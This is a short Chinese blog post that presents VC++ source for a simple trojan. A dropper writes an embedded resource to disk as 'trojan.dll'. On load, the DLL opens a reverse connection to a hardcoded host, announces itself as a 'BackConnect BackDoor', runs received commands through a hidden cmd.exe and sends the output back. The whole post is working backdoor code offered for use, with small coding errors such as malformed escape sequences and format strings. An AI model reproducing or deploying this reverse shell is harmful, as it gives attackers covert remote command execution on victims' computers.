ＶＣ＋＋远程插入dll代码

最新推荐文章于 2021-04-03 15:56:34 发布

这家伙很懒什么都没留下

最新推荐文章于 2021-04-03 15:56:34 发布

阅读量390

点赞数

分类专栏： VC++ 文章标签： vc++

VC++ 专栏收录该内容

25 篇文章

订阅专栏

本文介绍了一个简单的C/S架构木马程序实现方法，包括如何将资源文件写入磁盘、建立动态链接库以实现远程控制及通过Socket进行数据交换等关键技术。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

#include <windows.h>
#include<stdio.h>
#include "resource.h"

void WriteResourceToFile(char const *filename)
{

HINSTANCE hInstance=GetModuleHandle(NULL);

    HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),
                                  MAKEINTRESOURCE(RC_BINARYTYPE));
    HGLOBAL hgRes = LoadResource(hInstance, hResInfo);
    void *pvRes = LockResource(hgRes);
    DWORD cbRes = SizeofResource(hInstance, hResInfo);

    HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,
                              FILE_ATTRIBUTE_NORMAL, 0);
    DWORD cbWritten;
    WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);
    CloseHandle(hFile);
}

int main(void)
{
WriteResourceToFile("trojan.dll");
return 0;
}

/*************hacker.cpp->hacker.dll**********/
#include<winsock2.h>
#include<stdio.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
int StartSocket();//连接函数
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
)   //动态连接库的入口，相当于main()函数
{
switch(ul_reason_for_call)
    {
      case DLL_PROCESS_ATTACH:
       {
           DWORD id;           CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)StartSocket,NULL,0,&id);
           break;
       }
      default:
break;
    }
return TRUE;
}
int StartSocket()
{
char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome toHttp://www.hackerxfiles.net =========/r/n";
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf1[1024];   //作为socket接收数据的缓冲区
memset(buf1,0,1024);   //清空缓冲区
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
   {
     printf("WSAStartup error.Error:d/n",WSAGetLastError());
     return;
   }

   addr_in.sin_family=AF_INET;
   addr_in.sin_port=htons(80); //反向连接的远端主机端口
   addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1"); //远端IP
      if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
   {
     printf("Socket failed.Error:d/n",WSAGetLastError());
     return;
   }
   if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)     //连接客户主机
   {
     printf("Connect failed.Error:d",WSAGetLastError());
     return;
   }
      if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR) //发送欢迎信息
   {
        printf("Send failed.Error:d/n",WSAGetLastError());
        return;
   }

char buffer[2048] = {0};//管道输出的数据
for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
printf("Error On CreatePipe()");
     return;
}

STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"//cmd.exe /c");

int len=recv(sock,buf1,1024,NULL);
if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接，则自动退出程序
if(len<=1){send(sock,"error/n",sizeof("error/n"),0);continue;}

strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
send(sock,"Error command/n",sizeof("Error command/n"),0);
continue;
}

CloseHandle(hWrite);
//循环读取管道中数据并发送，直到管道中没有数据为止
for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){
send(sock,buffer,strlen(buffer),0);
}
     }
return 0;
}